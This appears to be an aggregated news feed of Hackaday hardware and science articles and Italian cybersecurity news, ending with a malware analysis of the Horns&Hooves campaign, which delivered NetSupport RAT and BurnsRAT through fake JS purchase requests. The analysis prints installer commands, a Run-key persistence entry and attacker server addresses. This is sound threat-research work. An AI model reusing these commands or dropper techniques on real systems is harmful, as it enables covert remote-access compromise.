If you’re used to thinking about 3D printing in Cartesian terms, prepare your brain for a bit of a twist with [Joshua Bird]’s 4-axis 3D printer that’s not quite like anything we’ve ever seen before.

The printer uses a rotary platform as a build plate, and has a linear rail and lead screw just outside the rim of the platform that serves as the Z axis. Where things get really interesting is the assembly that rides on the Z-axis, which [Joshua] calls a “Core R-Theta” mechanism. It’s an apt description, since as in a CoreXY motion system, it uses a pair of stepper motors and a continuous timing belt to achieve two axes of movement. However, rather than two linear axes, the motors can team up to move the whole print arm in and out along the radius of the build platform while also rotating the print head through almost 90 degrees.

The kinematic possibilities with this setup are really interesting. With the print head rotated perpendicular to the bed, it acts like a simple polar printer. But tilting the head allows you to print steep overhangs with no supports. [Joshua] printed a simple propeller as a demo, with the hub printed more or less traditionally while the blades are added with the head at steeper and steeper angles. As you can imagine, slicing is a bit of a mind-bender, and there are some practical problems such as print cooling, which [Joshua] addresses by piping in compressed air. You’ll want to see this in action, so check out the video below.

This is a fantastic bit of work, and hats off to [Joshua] for working through all the complexities to bring us the first really new thing we’ve seen in 3D printing is a long time.

youtube.com/embed/VEgwnhLHy3g?…

Thanks to [Keith Olson], [grythumn], [Hari Wiguna], and [MrSVCD] for the near-simultaneous tips on this one.

hackaday.com/2024/12/02/unique…

The world of the overclocker contains many arcane tweaks to squeeze the last drops of performance from a computer, many of which require expert knowledge to understand. Happily for Raspberry Pi 5 owners the Pi engineers have come up with a set of tweaks you don’t have to be an overclocker to benefit from, working on the DRAM timings to extract a healthy speed boost. Serial Pi hacker [Jeff Geerling] has tested them and thinks they should be good for as much as 20% boost on a stock board. When overclocked to 3.2 GHz, he found an unbelievable 32% increase in performance.

We’re not DRAM experts here at Hackaday, but as we understand it they have been using timings from the Micron data sheets designed to play it safe. In consultation with Micron engineers they were able to use settings designed to be much faster, we gather by monitoring RAM temperature to ensure the chips stay within their parameters. Best of all, there’s no need to get down and dirty with the settings, and they can be available to all with a firmware update. It’s claimed this will help Pi 4 owners to some extent as well as those with a Pi 5, so even slightly older boards get some love. So if you have a Pi 5, don’t wait for the Pi 6, upgrade today, for free!

hackaday.com/2024/12/02/a-free…

“Faccio parte di un’organizzazione giornalistica, di coloro che hanno fiducia nel giornalismo. Il giornalismo oggi non è più quello che era, sta scomparendo. Il potere del giornalismo si sta erodendo e probabilmente morirà. Questa è la dura realtà che ci occorre affrontare. Nelle nostre società, in occidente, il giornalismo è sotto attacco, la verità è […]

freeassangeitalia.it/intervent…

When humans counted on their fingers, everyone had a state-of-the-art (at the time) calculator at all times. But as we got smarter about calculation, we missed that convenience. When slide rules were king, techies were known to carry them around like swords swinging from their belts. These were replaced with electronic calculators, some also swinging from belt loops, but no matter how small they were, they still were not that handy, no pun intended. That changed around 1975. The Time Computer Calculator company produced an amazing calculator watch for Pulsar. At the time, Pulsar was a brand of the Hamilton Watch Company.
A Pulsar calculator watch (photo: The Smithsonian)
There were a few problems. First, the watch was thick. Despite its size, it had tiny keys, so you had to use a little stylus to push the keys — not as handy as you might wish. On top of that, 1975 display technology used power-hungry LEDs. So, the display was prone to turning off quickly, and the batteries died quickly.

Unsurprisingly, Hamilton, in conjunction with Electro/Data, had earlier rolled out the first LED watch in 1972. With an 18-karat gold case, it went for a cool $2,100 — a whole lot of money in 1972. The first calculator watch was also gold and went for almost $4,000. Soon, though, they brought out a stainless and a gold-filled version that came in at under $500.

Hewlett-Packard

The HP-01 (photo: [Stanlkocher] CC-BY-SA-3.0)Not to be outdone, HP created the HP-01 in 1977. These also came in gold and stainless models. Prices ranged from $450 to $850. You needed a special kit to do your own battery changes, so that added to the price, too. It also required a stylus. Unlike other HP calculators, the HP-01 did not use RPN.

For such a hefty price, these calculators didn’t do much. They were generally “four-bangers” with a few extra features, but they were no scientific calculators by any stretch of the imagination. The HP did have time and date calculations and could even use a stopwatch as a data source.

More calculator watches appeared directly from Time Computer Calculator Company and several others, but none were ever more than an expensive novelty. There were a few from companies like Seiko and Citizen. LCD screens would wipe out LEDs in watches, including calculator watches

Some lesser-known companies took their shots. Uranus Electronics was one. Hughes Aircraft also created an LED calculator watch with the name Compuchron.

Citizen had unusual round watches with tiny buttons around the circumference, including some that had scientific functions. These were the first calculator watches to use LCDs.

Seiko’s first entry had truly tiny buttons (see the video below). However, the C-515 had some of the nicest keys of the era, although design-wise, it was a bit blocky.

youtube.com/embed/8eeocDSZ4cY?…

youtube.com/embed/H-xnbrNLj9A?…

The calculator from National Semiconductor had a flip-down keyboard cover. (photo: [Mister RF] CC-BY-SA-4.0)National Semiconductor produced a very powerful scientific calculator watch that was available under different names from different companies.

The National watch was a big hit in 1977 and a marvel of miniaturization. You can find some very detailed teardown pictures on Wikimedia Commons.

It is hard to say how many of these calculator watches were made and sold. Most are rare, and you would imagine the gold ones were not big production runs. Even the cheaper models seemed more like stunts than mass-market products.

Clearly, there was some demand, but things remained a niche market, and smaller players weeded out quickly. The calculator watch market was relatively sleepy until 1980 when Casio decided to make them.

Casio

The CFX-400 was a top-of-the-line scientific calculator that even did hex (photo: [Septagram] Public Domain)Casio made a large variety of cheap watches. The Casio C-60 appeared in 1980, the first of their calculators. It would set the basic design for many of their future models, like the popular CA-50 which, along with the similar CA-53W, appeared in movies like Back to the Future II and III.

The CA-50 was popular, and it appeared, along with the similar CA-53W, in popular movies, including Back to the Future II and III. These had tiny buttons, but you could carefully use them with your fingers. Some models had raised buttons. Others had flat buttons. A few even had a form of touch screen.

There were many variations in the Casio calculator watches. Some could store data like phone numbers and addresses. Others had scientific functions, like the excellent CFX-400 or the less-capable CFX-200. The CMD-40 even had a basic remote control.

The nicer models had metal cases, but many were plastic. There were even some that looked like a normal analog watch, but the top would flip up to reveal the calculator display and keyboard. Tricky to replace the batteries on those as you can see on the video below.

Calculator watches became something of a fad, especially with the pocket-protector crowd. However, like all things, they faded in popularity over time and now most are collector’s items.

youtube.com/embed/yeYmcdH8U7M?…

Today

You can find cheap calculator watches readily on the usual Chinese import sites. Casio still sells some vintage-series calculator watches, and there’s a brisk used market for the watches from any manufacturer. However, outside of the collectible value, most people switched to small calculators, PDAs, and — later — cell phones and smartwatches.

I owned several Casios, including a flip top and the FX-400. I also had the nice boxy Seiko. I don’t think they have made it unless they are hiding in a box somewhere waiting to be rediscovered. Which ones did you have? Do you have them now? Do you ever really use them?

Before you take me to task for not mentioning Sinclair’s wrist calculator, I will point out that it wasn’t really a watch. It was just a calculator that strapped to your wrist.

There have been DIY calculator watches, of course. It would be even easier to produce one today than ever before. It might be fun to grab one of the new ones and give it a brain upgrade. Let us know if you take up the challenge.

Featured image: “Casio Gold Calculator Watch” by [jonrawlinson].

hackaday.com/2024/12/02/a-brie…

Birds have long been our inspiration for flight, and researchers at Princeton University have found a new trick in their arsenal: covert feathers. These small feathers on top of birds’ wings lay flat during normal flight but flare up in turbulence during landing. By attaching flexible plastic strips – “covert flaps” – to the top of a wing, the team has demonstrated impressive gains in aircraft performance at low speeds.

Wind tunnel tests and RC aircraft trials revealed a fascinating two-part mechanism. The front flaps interact with the turbulent shear layer, keeping it close to the wing surface, while the rear flap create a “pressure dam” that prevents high-pressure air from moving forward. The result? Up to 15% increase in lift and 13% reduction in drag at low speeds. Unfortunately the main body of the paper is behind a paywall, but video and abstract is still fascinating.

This innovation could be particularly valuable during takeoff and landing – phases where even a brief stall could spell disaster. The concept shares similarities with leading-edge slats found on STOL aircraft and fighter jets, which help maintain control at high angles of attack. Imitating feathers on aircraft wings can have some interesting applications, like improving control redundancy and efficiency.

youtube.com/embed/dLlJRujBWos?…

hackaday.com/2024/12/02/small-…

Gli analisti di McAfee hanno trovato 15 applicazioni dannose appartenenti alla famiglia SpyLoan nel Google Play Store. In totale, queste applicazioni hanno più di 8 milioni di installazioni e erano rivolte agli utenti del Sud America, del Sud-Est asiatico e dell’Africa. I più popolari sono elencati di seguito.

• Préstamo Seguro-Rápido, Seguro – 1.000.000 di download, principalmente rivolti agli utenti del Messico;
• Préstamo Rápido-Credit Easy – 1.000.000 di download, principalmente destinati alla Colombia;
• ได้บาทง่ายๆ-สินเชื่อด่วน – 1.000.000 di download, destinati agli utenti del Senegal;
• RupiahKilat-Dana cair – 1.000.000 di download, rivolti anche al Senegal;
• ยืมอย่างมีความสุข – เงินกู้ – 1.000.000 di download, destinati agli utenti della Tailandia;
• เงินมีความสุข – สินเชื่อด่วน – 1.000.000 di download, destinati anche alla Thailandia;
• KreditKu-Uang Online – 500.000 download, attacca principalmente utenti in Indonesia;
• Dana Kilat-Pinjaman kecil – 500.000 download, un’altra app destinata principalmente all’Indonesia.

È stato riferito che tutte le applicazioni sono state rimosse da Google Play, ma i ricercatori notano che la loro presenza nello store indica la persistenza dei criminali informatici. Il fatto è che non è la prima volta che tale malware viene scoperto e rimosso dallo store ufficiale.

Ad esempio, alla fine del 2023, gli specialisti di ESET hanno notato su Google Play 18 applicazioni che distribuivano SpyLoan e sono state scaricate più di 12 milioni di volte.

Le app SpyLoan sono apparse nel 2020 e sono solitamente pubblicizzate come strumenti finanziari che offrono agli utenti prestiti con rapida approvazione, ma i termini di tali prestiti sono spesso molto ingannevoli o semplicemente falsi.

Una volta che la vittima installa l’app SpyLoan, gli viene chiesto di completare la verifica utilizzando una password monouso (OTP). In questo modo gli aggressori si assicurano che la vittima si trovi nella regione giusta. All’utente viene quindi chiesto di fornire documenti di identificazione sensibili, informazioni sul datore di lavoro e informazioni bancarie.

Inoltre, le applicazioni SpyLoan richiedono sempre privilegi eccessivi sul dispositivo, tra cui: autorizzazione per utilizzare la fotocamera (apparentemente per caricare foto KYC), accesso al calendario, contatti, SMS, posizione, dati del sensore e così via. Di conseguenza, gli operatori delle app possono rubare dati sensibili dal dispositivo e utilizzarli per ricattare la vittima affinché paghi.

Pertanto, i truffatori possono inaspettatamente ridurre il periodo di rimborso del prestito a diversi giorni (o qualsiasi periodo di tempo arbitrario), minacciare l’utente e chiedere denaro, promettendo altrimenti di divulgare i suoi dati o rivelare segreti.

Cioè, avendo ricevuto un prestito tramite tale applicazione, l’utente non solo deve pagare tassi di interesse elevati, ma è anche soggetto a continue molestie da parte degli operatori SpyLoan che lo ricattano utilizzando informazioni rubate. Inoltre, in alcuni casi, i truffatori contattano anche i familiari e gli amici del mutuatario, minacciando anche loro.

L'articolo Google Play Store: il Cassonetto del Software! 15 App Malevole Rubano i Dati a 8 Milioni di Utenti proviene da il blog della sicurezza informatica.

The 20th century saw humankind’s first careful steps outside of the biosphere in which our species has evolved. Whereas before humans had experienced the bitter cold of high altitudes, the crushing pressures in Earth’s oceans, as well as the various soundscapes and vistas offered in Earth’s biosphere, beyond Earth’s atmosphere we encountered something completely new. Departing Earth’s gravitational embrace, the first humans who ventured into space could see the glowing biosphere superimposed against the seemingly black void of space, in which stars, planets and more would only appear when blending out the intense light from the Earth and its life-giving Sun.

Years later, the first humans to set foot on the Moon experienced again something unlike anything anyone has experienced since. Walking around on the lunar regolith in almost complete vacuum and with very low gravity compared to Earth, it was both strangely familiar and hauntingly alien. Although humans haven’t set foot on Mars yet, we have done the next best thing, with a range of robotic explorers with cameras and microphones to record the experience for us here back on Earth.

Unlike the Moon, Mars has a thin but very real atmosphere which permits the travel of soundwaves, so what does the planet sound like? Despite what fictional stories like Weir’s The Martian like to claim, reality is in fact stranger than fiction, with for example a 2024 research article by Martin Gillier et al. as published in JGR Planets finding highly variable acoustics during Mars’ seasons. How much of what we consider to be ‘normal’ is just Earth’s normal?

Spherical Astronauts On Mars

Curiosity rover’s robotic arm showing drill in place, February 2013 (Credit: NASA/JPL-Caltech)
A major limitation with experiencing extraterrestrial worlds is of course that even if we could easily zip over to the more distant ones in a faster-than-light spacecraft, our bodies have evolved within the confines of the Earth’s biosphere and explicitly just the biosphere as it has existed only relatively recently, geologically speaking. Even the atmospheric conditions of the Earth’s Cambrian period would be lethal to humans, with virtually no oxygen to breathe. It’s highly unlikely that we will find any planets out there that are at least as friendly to human life as the Cambrian period would be to our astronauts, so our experience of alien worlds will most assuredly not match those of the average Star Trek episode.

But assume, if you will, that our perfectly spherical, friction-less astronauts are as impervious to cold, heat and radiation as the intrepid robotic explorers which currently peruse the surface of Mars or which have in the past prodded the Venusian atmosphere and its surface. If stepping outside the lander in this ideal scenario, what can our robotic friends tell us about what walking on Mars would be like?

With Mars much further away from the Sun, its light is dimmer, though still bright enough to make out the rocky reddish, brown, greenish and tan coloring. Most steps that you take will leave behind a footprint, albeit not as deep as on Earth due to Mars gravity of only about 0.38 g, or roughly a third of Earth’s. This does preclude the option of bunny hopping across the surface as on the Moon with its 0.165 g.

Mars’ atmosphere is quite thin, also on account of the planet having lost its magnetosphere a long time ago, exposing the atmosphere to the solar winds as they rip and tear away at it. With an atmospheric density of at most 1,150 Pa (on the Hellas Planitia plain) it’s akin to being on Earth at an altitude of 35 km, or well above the average commercial jetliner’s cruising altitude of below 12 km. Even so, sounds are audible, albeit attenuated courtesy of the 96% CO₂ content of the Martian atmosphere. This makes everything sound muted and quite different from what we are used to on Earth.

Whether you stand still and take in the vista surrounding you, or move around, you can hear something like what the Perseverance rover recorded using its twin microphones:

youtube.com/embed/GHenFGnixzU?…

Perseverance also captured the noise of the Ingenuity helicopter as it flew near the rover at a distance of 80 meters, all of which provided researchers with invaluable data on how sound propagates on Mars. In the earlier referenced paper by Martin Gillier et al. the attenuation is calculated to be 500 times higher for low frequencies and 10 times higher at high frequencies as in Earth’s atmosphere at sea level.

Meanwhile the speed of sound on Mars on its surface varies as the CO₂ in the atmosphere increases or decreases with the seasons, especially near the poles where carbon dioxide ice is known to exist. Compared to the speed of sound in Earth’s atmosphere of 343 m/s, on Mars you can expect around 252 m/s, although this will differ wildly per season and at which altitude you are.

As glorified in The Martian and other works of fiction Mars may be, the experience of walking around on its surface would be mostly one of eerie disconnect due to the lower gravity and the muffled sounds including those made by one’s own boots. Assuming that the radiation blasting the Martian surface and intense temperature swings are no concern, this might yet be the perfect vacation spot for some astronauts.

From Venus With Love

The Venus surface, as photographed by the USSR Venera 13 in 1982 (recolorized).
The Soviet Venera 13 and 14 missions featured the first landers to Venus that were equipped with microphones. These were active during their final descent, as well as the workings of the pyrotechnics and surface drill, prior to the quiet observation of the lander with its scientific instruments. Below is embedded part of the audio from the Venera 14 mission (also on Archive.org).
hackaday.com/wp-content/upload…
Based on these audio recordings, the wind speed on Venus’ surface was calculated to be on average 0.3 and 0.5 m/s, which doesn’t seem much until you realize that this is with a pressure of around 9.5 MPa (94 times Earth’s atmosphere) and a temperature of 465 ℃. These findings were covered in a 1982 paper by L. V. Ksanfomaliti et al. (PDF) as submitted to Soviet Astronomy Letters.

The effect for our theoretical astronaut would be akin to being crushed and burned at the same time, while the thick, mostly CO₂-based atmosphere slowly churns past.

It is for this reason that our less-invincible astronauts would remain in the Venusian atmosphere at a more agreeable pressure and temperature level. In such a floating colony the experience would be much more akin to being on Earth at ground level, if you excuse the sulfuric rain droplets, of course.

Welcome To Europa

So far our photographic and auditory collection of extraterrestrial planets is still rather limited, with Mars and Venus being the two primary examples where we have collected both types of recordings on their respective surfaces. However, depending on how things work out, we may soon be adding Jupiter’s moon Europa to this list. This is perhaps the most intriguing target in our solar system which we have not visited yet in any significant detail, despite it being assumed to be a water ice-covered moon that is slightly smaller than Earth’s Moon, with potentially liquid water below the ice.
Europa’s interior and thin, mostly oxygen and water vapor atmosphere. (Credit: NASA/JPL-Caltech)
Recently the Europa Clipper spacecraft was launched on its multi-year mission for a rendezvous with Europa by April 2030. One of its mission goals at Europa is to determine a suitable landing site for the proposed Europa Lander, which – if funded – would land on Europa in the 2030s where it would be able to examine and image the surface. Sadly Europa does not have much of at atmosphere, much like Earth’s Moon, but it might make for a fascinating place to do some ice skating for our radiation-proof astronauts. If there is a liquid ocean underneath the ice as suspected, then deep-sea diving on Europa is definitely also on the menu, barring any scary oceanic lifeforms in said oceans.

Beyond these places in our solar system the sounds and sights become sadly a bit murky. Mercury is a Sun-blasted rock, while Pluto is a darkness-shrouded rock, and all of Jupiter, Saturn, Neptune and Uranus are gas giants. Beyond perhaps a couple of the more interesting moons surrounding these gas giants we will have to look beyond this solar system to find more interesting extraterrestrial sights and sounds. Fortunately for this we will only have to send out our faster-than-light spacecraft into deep space, as there are still billions upon billions of star systems to examine and places to experience. Makes you realize how good we’ve got it here on earth.

hackaday.com/2024/12/02/explor…

Energy is expensive these days. There’s no getting around it. If, like [Giovanni], you want to keep better track of your usage, you might find value in his DIY energy meter build.

[Giovanni] built his energy meter to monitor energy usage in his whole home. An ESP32 serves as the heart of this build. It’s hooked up with a JSY-MK-194G energy metering module, which uses a current clamp and transformer in order to accurately monitor the amount of energy passing through the mains connection to his home. With this setup, it’s possible to track voltage, current, frequency, and power factor, so you can really nerd out over the electrical specifics of what’s going on. Results are then shared with Home Assistant via the ESPHome plugin and the ESP32’s WiFi connection. This allows [Giovanni] to see plots of live and historical data from the power meter via his smartphone.

A project like this one is a great way to explore saving energy, particularly if you live somewhere without a smart meter or any other sort of accessible usage tracking. We’ve featured some of [Giovanni]’s neat projects before, too.

youtube.com/embed/hP4fDkFyy3w?…

hackaday.com/2024/12/02/esp32-…

Secondo gli esperti di sicurezza, il crash del sito web del Vaticano della scorsa settimana presenta i tratti distintivi di un attacco informatico, evidenziando l’esposizione online del Vaticano alla possibilità di interferenze da parte di malintenzionati.

La maggior parte del sito web del Vaticano è andato in crash il 19 novembre ed è rimasto irraggiungibile per diversi giorni in alcune parti del mondo. Sebbene il Vaticano non abbia confermato l’origine del problema, il portavoce vaticano Matteo Bruni ha lasciato intendere che gli stessi funzionari vaticani sospettano un attacco ai loro server web.

Bruni ha affermato che sui server si è verificato un “numero anomalo di interazioni” che, in combinazione con le contromisure utilizzate, ha portato ad una serie di effetti a cascata sull’infrastruttura IT della Chiesa.

Gli esperti ritengono che il numero anomalo di interazioni sia coerente con un attacco DDoS, sebbene la fonte di tale attacco non sia chiara. In Vaticano, alcuni hanno sospettato che un attacco informatico potrebbe essere stato programmato per coincidere con la visita in Vaticano del 20 novembre della First Lady ucraina Olena Zelenska.

Se il crash del sito fosse dovuto a un attacco informatico, si tratterebbe dell’ultimo di una lunga serie di attacchi informatici motivati politicamente contro il Vaticano. Nel 2015, i dati personali dei giornalisti della Radio Vaticana e il sito web del Vaticano sono stati hackerati due volte dal gruppo di hacker Anonymous.

Nel 2018, sia il Vaticano che la diocesi di Hong Kong sono stati colpiti dagli hacker RedDelta, presumibilmente sostenuti dal regime cinese, in vista dei colloqui per il rinnovo di un accordo provvisorio sulle nomine episcopali. Nel 2022, invece, il sito web del Vaticano è stato oscurato il giorno dopo che il Papa aveva criticato l’invasione russa dell’Ucraina.

Gli attacchi DDoS sono solitamente condotti tramite bot che portano un server a bloccarsi a causa del volume di richieste. Il loro obiettivo non è accedere a informazioni private, ma semplicemente bloccare un sito Web per impedire agli utenti di utilizzarlo.

Charles Brooks, ex funzionario del DHS e professore di sicurezza informatica alla Georgetown University, ha guidato un gruppo di esperti cattolici in sicurezza informatica che hanno sollecitato la Santa Sede a creare un'”Autorità per la sicurezza informatica del Vaticano” nel maggio 2023, poiché erano preoccupati per le debolezze dell’infrastruttura digitale del Vaticano.

Sebbene gli attacchi DDoS derivino solitamente da attacchi informatici su larga scala, molti esperti ritengono che nel caso del Vaticano sia difficile individuare la fonte degli attacchi a causa della vulnerabilità dei server web. Andrew Jenkinson, CEO dell’azienda britannica di sicurezza informatica CIP, ha dichiarato a The Pillar di aver cercato di mettere in guardia la Santa Sede dalle vulnerabilità della sua sicurezza informatica almeno dal 2020.

Jenkinson ha mostrato a The Pillar un’analisi dei server critici del Vaticano che erano stati segnalati come non sicuri e ha affermato che il DNS (Domain Name System) era esposto. “Quando abbiamo provato ad assisterli nel 2020 e nel 2021, oltre il 90% dei loro siti web risultava Non sicuro. Non ci sono scuse per fallimenti di sicurezza così basilari”, ha detto Jenkinson a The Pillar .

L'articolo Il Lungo Down dei server del Vaticano, il misterioso crash e i sospetti DDoS proviene da il blog della sicurezza informatica.

La cyber security è, innanzitutto, una sfida culturale. Le aziende italiane non possono più permettersi di considerarla come una questione esclusivamente tecnica. È importante adottare un approccio integrato in cui tecnologia, normative e formazione, unite, creino un ambiente più sicuro e resiliente

L'articolo Cyber attacchi, quando l’efficacia è data anche dall’incoscienza di chi li riceve proviene da Cyber Security 360.

La presentazione della piattaforma di registrazione NIS2 per l’avvio degli adeguamenti richiesti dalla direttiva europea ha rappresentato un momento di formazione e informazione per tutti gli stakeholder nazionali. Si inizia a fare sul serio e l’obiettivo è alzare il livello cyber del sistema Paese

L'articolo Direttiva NIS2: ha inizio la fase operativa e che nessuno resti indietro proviene da Cyber Security 360.

Gli attacchi informatici condotti dalle cyber gang nordcoreane rappresentano una minaccia senza precedenti per il settore delle criptovalute e per la sicurezza finanziaria globale. Ecco perché è urgente rafforzare le difese cibernetiche e sviluppare strategie internazionali coordinate per prevenire futuri attacchi

L'articolo Hacker nordcoreani rubano miliardi in criptovalute: tattiche sofisticate per finanziare il regime proviene da Cyber Security 360.

Recent months have seen a surge in mailings with lookalike email attachments in the form of a ZIP archive containing JScript scripts. The script files – disguised as requests and bids from potential customers or partners – bear names such as “Запрос цены и предложения от Индивидуального предпринимателя <ФИО> на август 2024. АРТ-КП0005272381.js” (Request for price and proposal from sole trader <name> for August 2024. ART-KP0005272381.js), “Запрос предложений и цен от общества с ограниченной ответственностью <предприятие> на сентябрь 2024. отэк-мн0008522309.js” (Request for proposals and prices from LLC <company> for September 2024. Otek-mn0008522309.js), and the like.

Examples of malicious emails

According to our telemetry, the campaign began around March 2023 and hit more than a thousand private users, retailers and service businesses located primarily in Russia. We dubbed this campaign Horns&Hooves, after a fictitious organization set up by swindlers in the Soviet comedy novel The Golden Calf.

Statistics

Number of users who encountered the malicious script, by month, March 2023 — September 2024 (download)

Malicious scripts

During the campaign, the threat actors made some major changes to the script, while keeping the same distribution method. In almost all cases, a JS script named “Заявка на закупку…” (“Purchase request…”), “Запрос цен…” (“Request for quote…”), or similar was sent in a ZIP archive. Far more rarely, the scripts were called “Акт сверки…” (“Reconciliation statement…”), “Заявление на возврат…” (“Request for refund…”), “Досудебная претензия…” (“Letter of claim…”) or just “Претензия…” (“Claim…”). The earliest versions that we encountered in April and May used scripts with the HTA extension instead of JS scripts.

For believability, besides the script, the attackers sometimes added to the archive various documents related to the organization or individual being impersonated. For example, an archive attached to a booking cancellation email contained a PDF file with a copy of a passport; while price request emails had extracts from the Russian Unified State Register of Legal Entities, certificates of tax registration and company cards in attachment. Below, we examine several versions of the scripts used in this campaign.

Typical archive contents

Version A (HTA)

Some of the first sample scripts we saw in April and early May 2023 were relatively small in size. As an example, we analyzed a sample with the MD5 hash sum 327a1f32572b4606ae19085769042e51.

First version of the malicious script in attachment

When run, the script downloads a decoy document from linkpicture[.]com/q/1_1657.png in the form of a PNG image, which it then shows to the user. In this case, the image looks like a screenshot of a table listing items for purchase. It may have been taken from a previously infected machine.

Decoy document in PNG format

Note that PNG decoy documents are rather unconventional. Usually, bids and requests that are used to distract user attention from malware are distributed in office formats such as DOCX, XSLX, PDF and others. The most likely reason for using PNG is that in the very first versions the attackers hid the payload at the end of the bait file. PNG images make convenient containers because they continue to display correctly even after the payload is added.

To download the decoy document, the attackers use the curl utility, which comes preinstalled on devices with Windows 10 (build 17063 and higher). Together with the document, using another built-in Windows utility, bitsadmin, the script downloads and runs the BAT file bat_install.bat to install the main payload. The script also makes use of bitsadmin for managing file transfer tasks.

Snippet of the BAT script that installs the payload

Using bitsadmin, the BAT script first downloads from the attackers’ address hxxps://golden-scalen[.]com/files/, and then installs, the following files:

To download the required file, bat_install.bat appends its name to the end of the URL. The script saves the downloaded files to the user directory %APPDATA%\VCRuntineSync.

The payload is the legitimate NetSupport Manager (NSM) tool for remote PC management. This software is often used in corporate environments for technical support, employee training and workstation management. However, due to its capabilities, it is regularly exploited by all kinds of cybergangs. The versions and modifications of this software seen in cyberattacks and providing a stealth run mode have been dubbed NetSupport RAT.

Most often, NetSupport RAT infiltrates the system through scam websites and fake browser updates. In December 2023, we posted a report on one such campaign that installed NetSupport RAT under the guise of a browser update after the user visited a compromised website.

After the file download, the bat_install.bat script runs the client32.exe file and adds it to the startup list.
start /B cmd /C "start client32.exe & exit"
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v
"VCRuntineSync" /t REG_SZ /d '%APPDATA%\VCRuntineSync\client32.exe' /f
And, in case the HTA script failed, the BAT script attempts to download and run the bait file.

When NetSupport RAT is run, it establishes a connection to one of the attackers’ servers set in the client32.ini configuration file: the main one, xoomep1[.]com:1935, or the backup one, xoomep2[.]com:1935.

The client32.ini configuration file

Version A infection chain

Version B (JS + NSM)

A bit later, in mid-May 2023, there appeared versions of the script mimicking legitimate JS files.

JS version of the malicious script in attachment

The code of this script contains a comment from the publicly available JavaScript library Next.js with license and copyright information. This way, the attackers try to make the code appear legitimate. We also see how they added malicious code to the middle of the file that a cursory inspection would miss, but still got executed at runtime.

In terms of functionality, the JS versions of the script are virtually the same as the HTA ones. They too show a decoy document and install NetSupport RAT. But there are some differences. For example, the script with the hash sum b3bde532cfbb95c567c069ca5f90652c, which we found under the filename ” досудебная претензия от 18.05.2023 №5 от компании ооо <НАЗВАНИЕ_КОМПАНИИ>.js ” (“Letter of claim No. 5, dated May 18, 2023, from LLC <company>.js”), first downloads an intermediate JS script from the address hxxp://188[.]227[.]58[.]243/pretencia/www.php.

Second script contents

This second script downloads two more files: the decoy document zayavka.txt and the NetSupport RAT installer installer_bat_vbs.bat. Like PNG images, decoy documents in TXT format are not standard practice. And with this version, the files contain generated text in Russian that is meaningless and repeated several times, using different characters that look vaguely Cyrillic. They would appear to be the first tests of the new bait file format.

Decoy document with meaningless text

After downloading the files, the www.php script opens the text document and runs the NetSupport RAT installer, which it saves with the name BLD.bat. To download the NetSupport components, the script uses the same path as version A: hxxps://golden-scalen[.]com/files/. Unlike the previous version, this script downloads the files to the %APPDATA%\EdgeCriticalUpdateService directory. Correspondingly, the autorun registry key used by this version is named EdgeCriticalUpdateService. Also, the BLD.bat file contains no redundant code for re-downloading the bait file.

Version B infection chain

Version C (JS + BurnsRAT)

Another interesting sample we found in mid-May had the name ” заявка на закупки №113 от компании <НАЗВАНИЕ_КОМПАНИИ> на май 2023 года.js ” (“procurement request No. 113 from <company> for May 2023.js”) and the MD5 hash sum 5f4284115ab9641f1532bb64b650aad6.

Fully obfuscated version of the malicious script

Here, we also see a comment with license and copyright information about the Next.js library, but there is nothing left of the library source code. The malicious code itself is more heavily obfuscated, and the link to the intermediate script hxxp://188[.]227[.]106[.]124/test/js/www.php is invisible to the naked eye.

Second script contents

In this version, the intermediate script downloads three more files: the decoy document zayavka.txt, the payload BLD.exe, and the auxiliary script 1.js. The decoy document in this instance looks more meaningful, and is likely the result of a screenshot-to-text conversion.

Decoy document

Having loaded the files, the www.php script opens the decoy document and runs the 1.js file, which in turn launches the BLD.exe file.

What’s most striking about this instance is the payload.

BLD.exe (MD5: 20014b80a139ed256621b9c0ac4d7076) is an NSIS installer that creates a Silverlight.7z archive in the %PROGRAMDATA%\Usoris\LastVersion folder and extracts several files from it:

The next step is to run the legitimate Silverlight.Configuration.exe file. When launched, it loads the dynamic libraries (DLLs) that the program needs, using a relative path. This opens the door to a DLL side-loading attack: the malicious msimg32.dll library and the utility are placed in the same directory, which results in the malicious program being loaded and gaining control instead of the system library. Although the backdoor supports commands for remotely downloading and running files, as well as various methods of executing commands via the Windows command line, the main task of this component is to start the Remote Manipulator System (RMS) as a service and send the RMS session ID to the attackers’ server.
svchost.exe -k "WUDFHostController" -svcr "WUDFHost.exe"
On top of that, msimg32.dll sends information about the computer to the server hxxp://193[.]42[.]32[.]138/api/.

Outgoing request to the server

The sent data is encrypted using the RC4 algorithm with the Host value as the key, which in this case is the IP address of the server, 193.42.32[.]138.

System information sent by the library

RMS is an application that allows users to interact with remote systems over a network. It provides the ability to manage the desktop, execute commands, transfer files and exchange data between devices located in different geographic locations. Typically, RMS uses encryption technologies to protect data and can run on a variety of operating systems. The RMS build distributed by the attackers is also called BurnsRAT.

RMS has support for connecting to a remote computer via Remote Desktop Protocol (RDP), so besides the application itself and files for running it, the NSIS installer saves to the device the w32.dat and w64.dat archives, which contain a set of libraries created using RDP Wrapper to activate additional RDP features.

RDP Wrapper is a program for activating remote desktop features in Windows versions that do not support them by default, such as Windows Home; it also allows multiple users to connect to one system simultaneously.

At its core, RMS is a close analog of NetSupport, but the RMS payload did not gain traction.

BurnsRAT infection chain

Version D (JS + Hosted NSM ZIP)

A few more characteristic changes in the scripts caught our eye in late May 2023. Let’s examine them using a file named “purchase request from LLC <company> No. 3.js” with hash sum 63647520b36144e31fb8ad7dd10e3d21 as an example. The initial script itself is very similar to version B and differs only in the link to the second script, hxxp://45[.]133[.]16[.]135/zayavka/www.php. But unlike version B, the BAT file for installing NetSupport RAT has been completely rewritten.

BAT script contents

In this version, it is located at hxxp://45[.]133[.]16[.]135/zayavka/666.bat, and to install NetSupport it downloads an intermediate PowerShell script hxxp://45[.]133[.]16[.]135/zayavka/1.yay, which in turn downloads and unpacks the NetSupport RAT archive from hxxp://golden-scalen[.]com/ngg_cl.zip. The contents of the archive are identical in every way to the NetSupport version installed by the version B script.

PowerShell script contents

Version D infection chain

Version E (JS + Embedded NSM ZIP)

The next notable, but less fundamental changes appeared in June 2023. Instead of downloading the encoded ZIP archive with NetSupport RAT, the attackers began placing it inside the script. This caused the script to increase in size. In addition, the comment in the file header was replaced with one from the Backbone.js library.

Snippet of the third version of the script

Starting around September 2023, the NetSupport RAT files were split into two archives; and since February 2024, instead of text bait files, the attackers have been striving for greater plausibility by using PDF documents which were also contained in the script code.

Version E decoy document

Version E infection chain

Attribution

